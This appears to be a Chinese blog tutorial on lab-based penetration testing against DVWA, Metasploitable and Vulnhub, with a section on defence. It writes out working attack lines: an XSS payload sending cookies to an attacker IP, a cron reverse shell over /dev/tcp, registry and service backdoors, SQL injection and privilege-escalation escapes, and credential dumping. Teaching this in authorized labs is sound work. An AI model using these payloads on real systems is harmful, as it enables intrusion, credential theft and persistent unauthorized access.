网络安全入门实战教程

前言:拥抱安全思维
网络安全不再是选修课,而是数字时代的生存技能。本教程摒弃纯理论,以实战为核心,带你从零构建黑客思维(Ethical Hacking),掌握渗透测试基础。通过搭建环境、分析漏洞、实施攻防,你将理解攻击者视角,从而更有效地防御威胁。


第一部分:基础认知与环境搭建

1. 网络安全核心概念
  • CIA三元组: 机密性(Confidentiality)、完整性(Integrity)、可用性(Availability)是安全基石。

  • 威胁 vs 漏洞 vs 风险:

    • 威胁:可能造成危害的潜在事件(如黑客、恶意软件)。

    • 漏洞:系统/软件中的弱点(如未修复的软件缺陷、弱密码)。

    • 风险:威胁利用漏洞造成损失的可能性与影响。

  • 攻击类型概览:

    • Web攻击:SQL注入、XSS、CSRF、文件上传漏洞等。

    • 网络攻击:中间人攻击(MitM)、DoS/DDoS、ARP欺骗、端口扫描。

    • 系统攻击:密码破解、提权漏洞、恶意软件。

  • 渗透测试(Penetration Testing): 模拟攻击者行为,在授权范围内发现漏洞并评估风险。核心阶段:侦查 -> 扫描 -> 获取访问 -> 维持访问 -> 痕迹清理

  • 道德与法律: 必须在合法授权下进行测试,目标只能是自有资产或明确授权的靶场/系统。未经授权的访问是违法行为

2. 搭建专属安全实验室 (安全沙箱)

第二部分:信息收集 - 知己知彼

1. 被动信息收集 (OSINT)
  • 目标: 不直接接触目标系统,利用公开资源获取信息。

  • 工具与方法:

    • Whois查询: whois example.com (Kali终端) 或 Whois Lookup, Domain Availability & IP Search - DomainTools 获取域名注册信息、管理员邮箱、DNS服务器。

    • DNS枚举:

      • dig example.com ANY :获取所有DNS记录。

      • dnsenum example.com (Kali自带):更全面的枚举(A, MX, NS记录,尝试域传送)。

      • sublist3r -d example.com :查找子域名。

    • 搜索引擎技巧: Google Dorking:

      • site:example.com :搜索特定网站内容。

      • filetype:pdf site:example.com :查找目标网站的PDF文件。

      • intitle:"login" site:example.com :查找登录页面。

    • Shodan / Censys: 搜索暴露在互联网上的设备和服务 (IP, 端口, Banner信息)。访问 Shodan Search Engine 或 https://censys.io/。

2. 主动扫描与枚举
  • 目标: 直接与目标系统交互,探测其网络结构、开放端口、运行服务、操作系统等信息。

  • 网络扫描神器:Nmap

    • 基本扫描: nmap -sV -O -p- 192.168.56.101 (替换为靶机IP)

      • -sV:探测服务/版本。

      • -O:猜测操作系统。

      • -p-:扫描所有端口(1-65535)。范围扫描用 -p 80,443, 1000-2000

    • TCP SYN扫描(默认): nmap -sS 192.168.56.101 (快速,半开放连接)。

    • UDP扫描: nmap -sU 192.168.56.101 (较慢,UDP服务如DNS, SNMP)。

    • 输出结果: -oN normal.txt (普通文本), -oX results.xml (XML格式)。

    • 分析Nmap输出: 重点关注开放端口号、对应服务名称及版本号、操作系统猜测结果。这些是寻找漏洞的关键入口点。

  • 服务枚举:

    • SMB枚举(Windows靶机):

      • nmap --script=smb-os-discovery, smb-enum-shares, smb-enum-users -p 445 192.168.56.101

      • enum4linux -a 192.168.56.101 :更全面的SMB信息枚举(用户、组、共享、密码策略)。

    • SNMP枚举: snmpwalk -c public -v1 192.168.56.101 (如果public社区名有效)。 snmp-check 192.168.56.101 (信息更友好)。

    • HTTP服务枚举:

      • nikto -h http://192.168.56.101 :快速Web服务器漏洞扫描。

      • dirb http://192.168.56.101 /usr/share/wordlists/dirb/common.txt :目录/文件爆破(发现隐藏后台、敏感文件)。

      • gobuster dir -u http://192.168.56.101 -w /usr/share/wordlists/dirb/common.txt :类似Dirb,更快更灵活。


第三部分:漏洞扫描与利用实战

1. Web应用漏洞之王:SQL注入 (SQLi)
  • 原理: 攻击者将恶意SQL代码插入用户输入字段(如登录名、搜索框),欺骗后端数据库执行非预期操作,导致数据泄露、篡改甚至服务器沦陷。

  • 手动检测 (DVWA靶场 - Low Security):

    1. 访问 http://靶机IP/dvwa,登录 (admin/password)。

    2. 进入 SQL Injection 模块。

    3. 在输入框输入: ' (单引号)。观察页面是否报错(如SQL语法错误),是SQL注入的重要迹象。

    4. 判断字段数: 输入 1' order by 1-- - ,逐渐增加数字直到报错(如 order by 3 报错,则字段数为2)。-- - 是注释符。

    5. 确定显示位: 输入 1' union select 1, 2-- - 。页面通常会显示12的位置,即回显点。

    6. 获取数据库信息:

      • 1' union select version(), database()-- - :显示数据库版本和当前库名。

      • 1' union select table_schema, table_name from information_schema.tables-- - :列出所有库和表(information_schema 是元数据库)。

      • 假设发现dvwa库中有users表: 1' union select user, password from dvwa.users-- - 直接获取用户名和密码(MD5哈希)!

  • 自动化神器:sqlmap

    1. 找到存在注入点的URL: http://靶机IP/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#

    2. 在Kali终端运行:
      sqlmap -u "http://靶机IP/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=你的会话ID; security=low" --batch

      • -u:目标URL。

      • --cookie:提供登录后的Cookie(用浏览器开发者工具查看)。

      • --batch:使用默认选项。

    3. sqlmap会自动检测注入类型、获取数据库名、表名、列名,并最终dump出数据(如用户凭证)。

2. 跨站脚本攻击 (XSS)
  • 原理: 恶意脚本(JavaScript)被注入到Web页面中,当其他用户浏览该页面时,脚本在其浏览器执行,窃取Cookie、会话令牌或重定向到钓鱼网站。

  • 反射型XSS (DVWA - Low):

    1. 进入 XSS Reflected 模块。

    2. 在输入框输入: <script>alert('XSS')</script> 。点击Submit,成功弹窗!

  • 存储型XSS (DVWA - Low):

    1. 进入 XSS Stored 模块。

    2. 在留言板输入: <script>alert('Stored XSS!')</script> 。

    3. 提交后,每当任何用户访问此留言板,都会弹窗。

  • 实战利用:窃取Cookie

    1. 在攻击机Kali上启动一个简易HTTP服务器接收Cookie: nc -nlvp 4444 (监听4444端口)。

    2. 在XSS漏洞点注入: <script>document.location='http://攻击机IP:4444/?cookie='+document.cookie</script>

    3. 当受害者访问该页面时,其Cookie会被发送到你的nc监听端口。Cookie可用于会话劫持。

3. 利用永恒之蓝 (EternalBlue) 攻击Windows
  • 背景: MS17-010漏洞,影响SMBv1协议。Metasploitable 3 (Windows) 默认存在此漏洞。

  • Metasploit框架利用:

    1. 启动MSF: Kali中运行 msfconsole

    2. 搜索漏洞模块: search eternalblue 。

    3. 使用利用模块: use exploit/windows/smb/ms17_010_eternalblue 。

    4. 设置目标:

      • set RHOSTS 192.168.56.102 (Metasploitable 3 Windows IP)。

      • set PAYLOAD windows/x64/meterpreter/reverse_tcp (常用Payload)。

      • set LHOST 192.168.56.100 (Kali IP)。

      • set LPORT 4444 (Kali监听端口)。

    5. 发起攻击: run 或 exploit 。

    6. 成功利用: 若成功,你会获得一个 meterpreter shell (> 提示符)。这是功能强大的交互式后门。

  • Meterpreter基础命令:

    • sysinfo:查看系统信息。

    • getuid:查看当前权限。

    • screenshot:截取目标屏幕。

    • shell:进入系统命令Shell (如cmd.exe)。

    • upload /local/path/file.exe C:\\Windows\\Temp\\:上传文件到目标。

    • download C:\\interesting.txt /tmp/:下载文件到Kali。

    • keyscan_start + keyscan_dump:记录键盘输入(需迁移到稳定进程如explorer.exe:migrate -N explorer.exe)。

    • hashdump转储Windows SAM数据库中的密码哈希 (需要SYSTEM权限,尝试 getsystem)。

    • background:将当前会话放到后台 (用 sessions 查看, sessions -i id 恢复)。

    • exit:退出meterpreter。


第四部分:密码攻击

1. 离线破解:John the Ripper
  • 场景: 已获取密码哈希文件(如Linux /etc/shadow,Windows SAM/SYSTEM文件导出的哈希)。

  • 步骤:

    1. 准备哈希文件: 将哈希整理到一个文本文件中 (e.g., hashes.txt)。格式很重要:

      • Linux: username:$6$salt$hash (sha512crypt)。

      • Windows NTLM: username:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

    2. 破解:

      • 简单字典攻击: john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

      • 增量模式(暴力): john --incremental=Alnum hashes.txt (更慢但更彻底)。

      • 显示破解结果: john --show hashes.txt

2. 在线破解:Hydra
  • 场景: 针对服务登录接口进行爆破 (SSH, FTP, HTTP Form, RDP等)。

  • FTP爆破示例: hydra -L userlist.txt -P passlist.txt ftp://192.168.56.101

  • SSH爆破示例: hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.101

  • HTTP POST表单爆破 (DVWA登录):
    hydra -l admin -P rockyou.txt 192.168.56.101 http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed" -V

    • http-post-form:指定POST请求。

    • "/dvwa/login.php:...:URL路径和POST参数。^USER^/^PASS^是占位符。

    • "Login failed":失败时的页面特征字符串,用于判断是否成功。

  • 注意: 在线爆破易触发账号锁定和报警,谨慎使用!务必仅在授权靶机测试。


第五部分:权限提升 (Privilege Escalation)

1. Windows提权
  • 信息收集:

    • systeminfo:系统详细信息,查找补丁缺失。

    • whoami /priv:查看当前用户特权。

    • net user / net user username:查看用户信息。

    • net localgroup administrators:查看管理员组。

    • accesschk.exe -uwcqv "Users" * / accesschk64.exe -uwcqv "Authenticated Users" * (Sysinternals工具):查看Users/认证用户对哪些文件/服务有修改/启动权限。

  • 常见路径:

    • 内核漏洞提权: 利用未修补的系统内核漏洞 (如MS17-010 EternalBlue/SMBGhost)。使用 windows-exploit-suggester.py 或 wesng 根据systeminfo结果匹配可用EXP。在Meterpreter中用getsystem有时也能自动尝试。

    • 服务漏洞:

      • 服务权限配置错误: 检查是否有服务允许普通用户修改其路径或启动参数。sc qc ServiceName。如果可写,替换为恶意程序。

      • 不安全的服务权限: accesschk 发现对服务有SERVICE_CHANGE_CONFIG权限。sc config ServiceName binPath= "C:\Path\To\Malicious.exe" + sc start ServiceName

    • 计划任务: schtasks /query /fo LIST /v 查看计划任务,检查是否有任务以高权限运行且执行的文件可被修改。

    • AlwaysInstallElevated: 检查注册表项 HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated 和 HKEY_LOCAL_MACHINE\... 是否都为1。如果是,可用msiexec /i malicious.msi /quiet 安装恶意MSI获得SYSTEM权限。

    • 密码/凭证复用: 检查内存(mimikatz)、注册表、配置文件、回收站等。mimikatz 神器:在Meterpreter中 load kiwi -> creds_all / lsa_dump_sam

    • 可执行文件劫持: 利用DLL搜索顺序漏洞(如放在可写目录下的恶意DLL会被优先加载)。

2. Linux提权
  • 信息收集:

    • uname -a:内核版本。

    • sudo -l极其重要! 查看当前用户可无需密码运行的sudo命令。

    • id:用户/组信息。

    • find / -perm -u=s -type f 2>/dev/null:查找SUID文件(以文件所有者权限运行)。

    • find / -writable -type d 2>/dev/null:查找全局可写目录。

    • crontab -l / ls -al /etc/cron*:查看计划任务。

    • ps aux / top:查看进程。

  • 常见路径:

    • 内核漏洞提权: 利用内核EXP (如Dirty COW)。使用 linux-exploit-suggester.sh / linpeas.sh 自动扫描建议。

    • SUID滥用:

      • 查找已知危险SUID程序 (如findvimbashnmapmore/lesscpmv等)。

      • 例如:find . -exec /bin/bash -p \; (利用find-exec参数执行bash -p保留特权)。

      • 例如:sudo nmap --interactive -> nmap> !sh (老版本nmap)。

    • Sudo权限滥用:

      • 如果 sudo -l 显示可以无密码运行某些命令:

        • sudo vi /etc/passwd -> :!bash (在vi中执行shell)。

        • sudo find / -exec bash \;

        • sudo awk 'BEGIN {system("/bin/bash")}'

        • sudo perl -e 'exec "/bin/bash";'

        • (GTFOBins)[https://gtfobins.github.io/] 是查找命令利用方法的宝库!

    • 计划任务 (Cron Jobs):

      • 检查是否有全局可写的Cron脚本或Cron目录 (/etc/cron*)。写入反弹Shell脚本等待执行。

      • 检查Cron调用的脚本是否可写。

    • 环境变量劫持 (PATH):

      • 如果程序使用相对路径调用命令且PATH包含可写目录(如./tmp),在该目录放置同名恶意程序。

    • 弱权限配置文件: 检查 .ssh 目录权限、/etc/passwd//etc/shadow 可写性(极少见但危险)。/etc/passwd 可写时可直接添加特权用户。


第六部分:维持访问 & 内网渗透基础

1. 后门与持久化
  • Windows:

    • Meterpreter持久化: run persistence -X -i 60 -p 4444 -r 192.168.56.100 (开机自启,每60秒尝试连接)。

    • 计划任务: schtasks /create /tn "Backdoor" /tr "C:\Path\To\payload.exe" /sc onstart /ru System

    • 注册表自启项: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Backdoor /t REG_SZ /d "C:\Path\To\payload.exe"

    • 服务: sc create Backdoor binPath= "C:\Path\To\payload.exe" start= auto + sc start Backdoor

  • Linux:

    • Cron Jobs: (crontab -l; echo "@reboot /bin/bash -c '/bin/bash -i >& /dev/tcp/攻击机IP/4444 0>&1'") | crontab - (添加反弹Shell Cron)。

    • .bashrc / .profile: 在用户登录Shell配置文件中添加反弹Shell命令。

    • SSH Authorized Keys: 将攻击机公钥添加到目标用户的 ~/.ssh/authorized_keys

    • Systemd Service: 创建自定义服务文件在 /etc/systemd/system/ 并启用。

2. 内网代理与端口转发
  • 场景: 突破边界机器后,访问内部网络资源。

  • Meterpreter端口转发:

    • portfwd add -l 3389 -p 3389 -r 192.168.100.5 (将目标内网机器192.168.100.5的3389端口转发到本地攻击机的3389端口)。现在可用 rdesktop 127.0.0.1 连接内网机器的RDP。

  • Meterpreter Socks4a代理:

    1. use auxiliary/server/socks_proxy

    2. set VERSION 4a

    3. run (在MSF后台运行)。

    4. 在攻击机上配置浏览器或proxychains使用 127.0.0.1:1080 SOCKS4a代理。

  • proxychains:

    1. 安装:Kali自带 (sudo apt install proxychains4)。

    2. 编辑配置文件 /etc/proxychains4.conf,在末尾添加代理类型和地址 (如 socks4 127.0.0.1 1080)。

    3. 使用: proxychains4 nmap -sT -Pn 192.168.100.0/24 (通过代理扫描内网网段)。-sT 必须使用TCP Connect扫描,因为SOCKS不支持更高级扫描。


第七部分:防御基础

1. 系统加固
  • 最小化安装: 仅安装必需软件和服务。

  • 及时更新: 操作系统、应用软件、固件、库 及时打补丁!这是最有效的防御。

  • 强化账户安全:

    • 禁用或删除无用账户。

    • 强密码策略(长度、复杂度、定期更换)。

    • 禁用默认账户(如Windows的Administrator改名,Linux的root禁止SSH)。

    • 限制管理员权限(最小权限原则)。

    • 启用多因素认证(MFA)。

  • 防火墙配置:

    • Windows防火墙: 仅允许必要的入站规则(如特定IP访问特定端口)。

    • Linux iptables/nftables: 默认拒绝所有入站,只放行明确需要的端口和服务。示例规则:

      bash

      # iptables 基础规则示例
      iptables -P INPUT DROP
      iptables -P FORWARD DROP
      iptables -P OUTPUT ACCEPT
      iptables -A INPUT -i lo -j ACCEPT # 允许本地回环
      iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT # 允许已建立连接
      iptables -A INPUT -p tcp --dport 22 -s 管理IP段 -j ACCEPT # 仅允许特定IP SSH
      iptables -A INPUT -p tcp --dport 80 -j ACCEPT # 允许HTTP
      iptables -A INPUT -p tcp --dport 443 -j ACCEPT # 允许HTTPS
  • 禁用不必要服务: 关闭SMBv1、Telnet、FTP、RPC等老旧高危服务。

2. Web应用防护
  • 安全编码:

    • 输入验证: 对所有用户输入进行严格验证(白名单过滤)。

    • 输出编码: 在将数据输出到页面时进行HTML/URL/JavaScript编码,防御XSS。

    • 参数化查询/ORM: 永远不要拼接SQL语句! 使用Prepared Statements或ORM框架防御SQLi。

    • 文件上传:

      • 验证文件类型(后缀+内容MIME类型)。

      • 重命名文件(避免目录穿越)。

      • 存储在Web根目录之外。

      • 扫描上传文件中的恶意代码。

    • 会话管理: 使用安全的Session ID(长、随机、绑定IP/UA),设置HttpOnly和Secure Cookie标志。

  • Web应用防火墙 (WAF): 部署WAF(如ModSecurity, Cloudflare WAF, AWS WAF)拦截常见Web攻击(SQLi, XSS, RFI, LFI等)。理解其规则和绕过可能性。

  • HTTPS: 强制使用HTTPS (HSTS),配置强加密套件。

3. 安全监控与日志
  • 集中式日志: 使用SIEM(如ELK Stack, Splunk, Graylog)收集和分析系统、网络、应用日志。

  • 入侵检测系统 (IDS):

    • 网络IDS (NIDS): 监控网络流量 (如Suricata, Snort)。部署在关键网络边界。

    • 主机IDS (HIDS): 监控主机活动 (如OSSEC, Wazuh, Tripwire)。检测文件篡改、异常登录、可疑进程。

  • 定期审计: 进行漏洞扫描、渗透测试、配置审查。


第八部分:实战综合项目

目标: 在Vulnhub靶机 DC-1 (或类似如 Kioptrix Level 1) 上完成从信息收集到获取root权限的全过程。

步骤指引:

  1. 下载与导入: 从Vulnhub下载 DC-1 OVA/VMDK文件,导入VMware/VirtualBox,设置Host-Only网络。

  2. 信息收集:

    • 使用 netdiscover 或 arp-scan 发现靶机IP (e.g., 192.168.56.105)。

    • nmap -sV -O -p- 192.168.56.105:全面扫描端口和服务(会发现开放80(HTTP), 22(SSH)等)。

  3. Web渗透:

    • 访问 http://192.168.56.105,发现是Drupal CMS。

    • 使用 droopescan scan drupal -u http://192.168.56.105 扫描Drupal信息(版本、插件)。

    • 查找Drupal版本漏洞(如著名的Drupalgeddon)。使用 searchsploit drupal 查找EXP。

    • 利用Drupalgeddon (MSF: use exploit/unix/webapp/drupal_drupalgeddon2) 获取Shell (www-data权限)。

  4. 权限提升:

    • 在获取的Shell中,进行Linux提权信息收集 (sudo -lfind / -perm -4000 2>/dev/nulluname -a, etc.)。

    • 关键点: 查找可利用的SUID文件或可写配置文件。

    • DC-1常见路径: 利用 find 命令的SUID特性(类似前面Linux提权部分)获得root shell:find . -exec /bin/sh \;

  5. 获取Flag: 在root目录下找到最终的flag文件并读取内容。

  6. (可选) 报告撰写: 记录攻击步骤、利用的漏洞、获取的凭证、提权方法、发现的Flag以及防御建议。


第九部分:持续学习与资源

  • 学习路径:

    1. 基础巩固: 网络协议 (TCP/IP, HTTP/S, DNS, SMB, SSH)、操作系统 (Linux/Windows CLI)、一门脚本语言 (Python/Bash)。

    2. 平台与认证:

      • TryHackMe / HackTheBox: 最佳在线实战平台(从Beginner Paths开始)。

      • PortSwigger Web Security Academy: 顶尖Web安全免费实验室。

      • 认证: eJPT (入门友好) -> OSCP (黄金标准,注重实战) -> eWPT/eWPTX (Web深度) -> OSWE (代码审计)。

    3. 专项深入: Web安全、内网渗透、二进制安全/逆向工程、云安全(AWS/Azure/GCP)、移动安全(Android/iOS)。

  • 必读书籍:

    • 《Web Hacking 101》

    • 《The Web Application Hacker's Handbook》(Dafydd Stuttard, Marcus Pinto)

    • 《Penetration Testing: A Hands-On Introduction to Hacking》(Georgia Weidman) - 配套实验室

    • 《RTFM: Red Team Field Manual》 (参考速查)

    • 《Blue Team Field Manual》 (防御参考)

  • 社区与资讯:

    • 论坛: Reddit (/r/netsec, /r/AskNetsec), StackExchange Security。

    • 博客: Krebs on Security, Schneier on Security, PortSwigger Blog, Project Zero (Google)。

    • 漏洞情报: CVE Details, NVD, Exploit-DB。

    • 会议: Black Hat, DEF CON, OWASP AppSec Global。

  • 靶场推荐:

    • Vulnhub: 大量免费虚拟机靶场。

    • Hack The Box: 持续更新的挑战机器和实验室。

    • TryHackMe: 结构化学习路径和房间。

    • PentesterLab: 专注Web的练习环境。

    • OverTheWire: WarGames: 命令行游戏化学习 (Bandit -> Natas)。

  • 法律重申: 仅在你拥有明确书面授权的目标上进行安全测试! 未经授权的访问是犯罪。负责任地披露发现的漏洞。


结语:旅程的开始
这篇万字教程为你打开了网络安全实战的大门。真正的能力源于动手实践、不断试错、持续学习深度思考。从搭建实验室、扫描靶机到利用漏洞、提权固守,每一步都是经验的积累。保持好奇,坚持练习,加入社区,负责任地运用你的技能。安全之路漫长而精彩,愿你成为一名优秀的守护者!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

kuidun

有了兄弟们的打赏会让我更上一层

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值